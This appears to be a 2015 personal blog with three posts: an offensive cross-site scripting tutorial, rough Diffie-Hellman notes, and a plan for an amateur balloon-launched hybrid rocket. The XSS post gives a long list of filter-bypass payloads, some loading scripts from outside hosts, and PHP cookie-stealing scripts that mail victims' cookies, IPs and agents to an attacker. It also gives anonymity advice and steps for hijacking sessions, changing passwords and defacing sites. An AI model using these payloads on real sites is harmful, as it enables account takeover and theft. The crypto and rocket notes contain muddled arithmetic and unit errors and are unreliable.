Thursday, April 30, 2015

XSS attack Cross site server scripting

as needed
an exploitable webserver filter
an exploitable computer browser

There is no magic bullet.

Also needed; a free small anonymously acquired  with  a Random; Access Point, MAC, IP, User agent and header information,  names, dates  & places, anything that can be forged and turned off (without breaking connectivity or leaving a finger print in and of itself) shall be with no repeat patterns unless it is a most common shared public factor.



One can bypass server xss filters by the use of different encoding methods;
http://alihassanpenetrationtester.blogspot.com/2013/05/cross-site-scripting-xss-bypass-encoder.html

Use these exploits to test for vulnerabilities in the web filter of  the server in question with this
https://addons.mozilla.org/en-us/firefox/addon/xss-me/ & the latest version of Firefox.
PATH TOO XSS ME:Tools =>XSS ME=>Open XSS Me sidebar.

Copy and paste the following exploits it in the application field shown below in addition to the existing code.
PATH:Tools =>XSS ME=>Options=>XSS Strings.



Start Copy Here--------------------------------------------------------

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

<SCRIPT SRC="http://evil-site.com/xss.jpg"></SCRIPT>

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> 


<SCRIPT SRC=http://evil-site.com/xss.js> </SCRIPT>


';alert(String.fromCharCode(88,83,83))//\'; alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//\"; alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT> alert(String.fromCharCode(88,83,83))</SCRIPT>


<img src="javascript:alert('XSS');">


<img src=javascript:alert(&quot;XSS&quot;)>

<img src=javascript:alert(String.fromCharCode(88,83,83))>


<img src=&#106;&#97;&#118;&#97;&#115;&#99; &#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101; &#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>


<img src=&#0000106&#0000097&#0000118&#0000097 &#0000115&#0000099&#0000114&#0000105&#0000112 &#0000116&#0000058&#0000097&#0000108&#0000101 &#0000114&#0000116&#0000040&#0000039&#0000088 &#0000083&#0000083&#0000039&#0000041>


<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69 &#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27 &#x58&#x53&#x53&#x27&#x29>


<IMG SRC="jav&#x0A;ascript:alert('XSS');">

<iframe src=http://evil-site.com/evil.html <

<SCRIPT>x=/XSS/  alert(x.source)</SCRIPT>

<BODY BACKGROUND="javascript:alert('XSS')"> 


<BGSOUND SRC="javascript:alert('XSS');">

<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> 

<IMG SRC='vbscript:msgbox("XSS")'>

'';!--"<XSS>=&{()}  


';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
<IMG SRC=" &#14;  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
</script><script>alert('XSS');</script>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<!--[if gte IE 4]>
 <SCRIPT>alert('XSS');</SCRIPT>
 <![endif]-->
<BASE HREF="javascript:alert('XSS');//">
 <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
EMBED SRC="http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).:
org/xss.swf" AllowScriptAccess="always"></EMBED>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<XML SRC="xsstest.xml" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';
echo('IPT>alert("XSS")</SCRIPT>'); ?>
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
 <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
<A HREF="http://1113982867/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
<A HREF="//www.google.com/">XSS</A>
<A HREF="//google">XSS</A>
<A HREF="http://ha.ckers.org@google">XSS</A>
<A HREF="http://google:ha.ckers.org">XSS</A>
<A HREF="http://google.com/">XSS</A>
<A HREF="http://www.google.com./">XSS</A>
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
%3C
&lt
&lt;
&LT
&LT;
&#60
&#060
&#0060
&#00060
&#000060
&#0000060
&#60;
&#060;
&#0060;
&#00060;
&#000060;
&#0000060;
&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
&#x3c;
&#x03c;
&#x003c;
&#x0003c;
&#x00003c;
&#x000003c;
&#X3c
&#X03c
&#X003c
&#X0003c
&#X00003c
&#X000003c
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C
&#x03C
&#x003C
&#x0003C
&#x00003C
&#x000003C
&#x3C;
&#x03C;
&#x003C;
&#x0003C;
&#x00003C;
&#x000003C;
&#X3C
&#X03C
&#X003C
&#X0003C
&#X00003C
&#X000003C
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
\x3c
\x3C
\u003c
\u003C
End Copy Here--------------------------------------------------------



You may now proceed to scan for XSS vulnerabilities as pictured above. 


Once a vulnerability  is found the plugin will notify you via a chart of the known server vulnerabilities and hits.

lets assume we have a positive hits on the following exploits;

<IMG SRC="javascript:alert('XSS')"


<BGSOUND SRC="javascript:alert('XSS');">



We then must use a suitable payload...;

Payload A:The Cookie Thief script.

Steals the following and emails it to a email address that you prove:
IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie 

<IMG SRC="http://YourAnonymousSite.info/somethingrandomA.php"
<BGSOUND SRC="http://YourAnonymousSite.info/somethingrandomA.php">
Save this script as "somethingrandomA.php" (remove the A) upload onto your free small anonymously acquired  (Random; Access Point,  IP,  User agent and header information, MAC, names, dates  & places registered) server.

REMEMBER; One can bypass server xss filters by the use of different encoding methods;



<?php

function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}

function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();

$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");

if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
fclose($log);
}

logData();


mail(“hackerid@mailprovider.com”, ”Stolen Cookies”, IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n);

?>

<?php
$cookie = $HTTP_GET_VARS["cookie"]; mail(“hackerid@mailprovider.com”, ”Stolen Cookies”, $cookie);
?>





















Once you have The cookie in hand, One may use https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/ to add the cookies to Firefox. You will then own the session of the user still logged in allowing you to act as they do on a the target website until they log out. Change passwords, Deface the page, gather cyber intel, do as thy wilt.



Payload B:Universal JavaScript for setting homepage 

But what too set the home page too? http://b1tsh1fter.blogspot.com/2015/05/puffinfacebookfisher.html Is but one of many payloads you can set the homepage too.

only works for i.e. and mozilla

<IMG SRC="http://YourAnonymousSite.info/cookielogger.php"
<BGSOUND SRC="http://YourAnonymousSite.info/cookielogger.php">
Save this  script as "somethingrandomB.php" (remove the B) upload onto your anonymous server.
REMEMBER; One can bypass server xss filters by the use of different encoding methods;
<?php function GetIP() { if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) $ip = getenv("HTTP_CLIENT_IP"); else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) $ip = getenv("HTTP_X_FORWARDED_FOR"); else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) $ip = getenv("REMOTE_ADDR"); else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) $ip = $_SERVER['REMOTE_ADDR']; else $ip = "unknown"; return($ip); } function logData() { $ipLog="log.txt"; $cookie = $_SERVER['QUERY_STRING']; $register_globals = (bool) ini_get('register_gobals'); if ($register_globals) $ip = getenv('REMOTE_ADDR'); else $ip = GetIP(); $rem_port = $_SERVER['REMOTE_PORT']; $user_agent = $_SERVER['HTTP_USER_AGENT']; $rqst_method = $_SERVER['METHOD']; $rem_host = $_SERVER['REMOTE_HOST']; $referer = $_SERVER['HTTP_REFERER']; $date=date ("l dS of F Y h:i:s A"); $log=fopen("$ipLog", "a+"); if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog)) fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie "); else fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n"); fclose($log); } logData(); ?>

Wednesday, April 29, 2015

Public key & Diffie–Hellman key exchange


Public key Crypto
****************************

random prime a=""; && b="";

prk (a)x(b);=(c)

pk (c)

Decypt with prk (a)(b)
Encypted with pk (c)

Diffie–Hellman key exchange
*****************************

mod p=23=prime
Random base g = 5

("Alice sends Bob A = g.a"){
a= 6
g = 5
A = g.a

nA->nB
A =(g.a/5.6) mod p.23 = 8
s = 19.6 mod p.23 = 2
}


("BOB then sends Alice B = g.b"){
b= 15
g = 5
B = g.b

nA<-nB
B = (g.b/5.15) mod p.23 = 19
s = B.a/8.15 mod p.23=2
}


nA->nB
A =(g.a/5.6) mod p.23 = 8=A

s = A.b/19.6 mod p.23 = 2

nA<-nB
B = (g.b/5.15) mod p.23 = 19=B

s = B.a/8.15 mod p.23=2









Sunday, April 26, 2015

LOR

Low Orbital Rocket




AIRLIFTING TO 121440 FEET;
*********************************************************************************




The CargoLifter AirCrane CL BCS1 is based on a balloon of 15 m in diameter for a maximum uplift of one (1) ton


http://www.cargolifter.com/products/aircrane/



(1) 3/4 tons to be airlifted.
3-4 balloons should do.

The balloons can get us this far = 23 mi
We need to get past this point = 99 mi

*********************************************************************************

Hybrid liquid/solid rocket.
N20 as a liquid oxidizer.
Hydroxyl-terminated polybutadiene as a solid fuel.





The body;

*****************************************************************



15.5″ ID, 16″ OD, FIBERGLASS TUBE, 20′ LONG, BLACK


http://fiberglasstubingsupply.com/shop/color/15-5-id-16-od-fiberglass-tube-20-long-black/
$1,247.47

WEIGHT194 lbs
COLOR
Black
OUTER DIAMETER
16 inches
INNER DIAMETER
15.5 inches
LENGTH
240" 
20'
WALL THICKNESS
0.25 inches
TEMPERATURE RATING
Up to 237° F



Custom 15.5" 3.5:1 Ogive Fiberglass nose cone
$250.00
http://www.carolinacompositerocketry.com/115-351-Ogive-Fiberglass-12in-FG-NC.htm
+40 weight.
total weight so far

234 lbs

custom carbon fiber parts

http://dragonplate.com/custom-carbon-fiber-fabrication.asp
+200 weight.


Inner frame

+200 weight.

total weight so far

634 lbs




THE OXIDIZER;
*********************************************************************************
NOS 14748 - NOS Nitrous Bottles
(10 - Tanks) should fit in the 20 foot haul stacked side by side.

Carbon Fiber Nitrous Bottle

Nitrous Bottle


$632.95x10
$6320

http://www.jegs.com/i/NOS/741/14748/10002/-1?parentProductId=747614

Capacity 12.8lbs.
Length: 21"
Diameter: 7"
Hi-Flo Valve
For Optimum Weight Reduction
Weighs only 12.8lbs. 12 oz. empty
Carbon Fiber Wrapped 


Weight:13.lbs x 10
130


8.35 gallon= 1 pound

130.lb=1085.gl of Nitrous Oxide baby!

total weight so far

769 lbs


Length: 105''Length left: 135 "









To even the flow of injected N2O into the engine a small Q-Series, 1.9cc 24V compressor is added to each 1 of the 10 N2O tanks. This will trickle psi into each tank as well as normal air...this will only work in atmosphere.( a larger compressor might be needed? )

total weight so far

789 lbs

WARNING: N2O flow may need to be increased with wider channels and increased PSI overall.

Pressurization for each tank is about 800psi which gives us a total of 8000psi.




1 : 1/2" x 18" AF4750 Stainless Steel Flexible Metal Hose, SS Male NPT x SS Swivel Male NPT
$63.17


1 : EH50 D012 12v Series 1/2”, 10,000 PSI Solenoid Valve - Normally Closed
 $845

1 : AN Size:-6, to NPT Size:1/2 in.
$3.97
http://www.summitracing.com/parts/sum-220649



9 : -6 Y-fitting  for N2O
$23.46



19 : 24 inch NOS Stainless Steel Braided Hoses 15410NOS
$36.13





total weight so far
829 lbs












THE FUEL;
*********************************************************************************





HTPB - Hydroxyl Terminated PolyButadiene R45

http://aeroconsystems.com/cart/motor-making-supplies/htpb-rubber/

This is the classic solid rocket motor binder!
Typical mixing ratio for best cure is 88% HTPB - 12% Papi 94 when mixed with Papi 94, a room temperature cure catalyst.

130.lb=1085.gl of HTPB

Length: 90" HTPB solid fuel cylinder
7.5'
total weight so far

959 lbs



Papi 94 

http://aeroconsystems.com/cart/motor-making-supplies/papi-94-curative/

This is the classic solid rocket motor binder combination! Papi 94 is shipped in a container containing 415 grams of catalyst. This is enough curative to cure one gallon of HTPB.



THE ENGINE CASE
*********************************************************************************


12'' titanium-cylinder 

http://www.titaniumprocessingcenter.com/titanium-products/titanium-pipe.htm



http://www.ticotitanium.com/products/titanium-plate/

Length: 100" titanium-cylinder sealed on one end.
7.5'
+200 weight

total weight so far

1144 lbs



OxidizerFuelHypergolicMixture RatioSpecific Impulse
(s, sea level)
Density Impulse
(kg-s/l, S.L.)


Nitrous OxideHTPB (solid)No6.48248290

THE NOZZLE:
*********************************************************************************


Rocket end of the titanium-cylinder


clay & ceramic mix 
( coarse powder )
$650
https://www.unitednuclear.com/index.php?main_page=product_info&cPath=16_17_69&products_id=184


The nozzle will be molded inside of the titanium-cylinder out of ceramic clay, the inner dimensions will match those of a 
de Laval nozzle (convergent-divergent nozzle).

+86

total weight so far

1245 lbs


PLASMA ARC IGNITION SYSTEM:
*********************************************************************************
 $32.14x3













1225 lb for single rocket

I've decided on a multistage rocket system in an attempt to reach 99mi.









total weight so far

3695.lbs

 390.lbs HTPB
3225.gl N2O at 8000psi
Length: 26'














Actuators;
*********************************************************************************
This industrial grade linear servo product uses all metal lead screw components. The RC PWM control signal input makes this servo a drop-in for full scale model and remote robotics applications. IP64 environmental rating ensures moisture and dust stays out.
Specifications:
- 150 lb (667 N) force
- Uses standard RC PWM input command signal
- 12 VDC Power, ~3A at full load
- 6 inches travel
- 0.6 in/s (1.6 cm/s) speed
- IP 64 environmental protection
- Rod ends included
- Dimensions: 2 in dia X 17.5 in (5.1 cm X 44.5 cm) long
- Holds load without power







Serial 8-Servo Controller
$26.99



USB-to-Serial Converter 
$11.99




Raspberry pi 2 B
$35.00

NAVIO+
$168.00


GPS/GNSS antenna MCX
$12.00


Up to 100km Range
Can be upgraded(with option board) to a wireless modem(bidirectional), with serial control thru USB.

Scherrer Scherrer Tx 700 Pro
UHF Long Range RC
€ 299.99x2



Rx700 Long Range Receiver
Combine this with a Tx700Pro and get +100km range 
€ 115.00



Dipole Antenna for Long Range 433 MHz Receivers.
€ 6.99



Trivec-Avant AV-2040-2A / AV20402A / 2040-104 / 2040104 Portable Foldable UHF High Gain SATCOM Satellite Communication Antenna
$1,500.00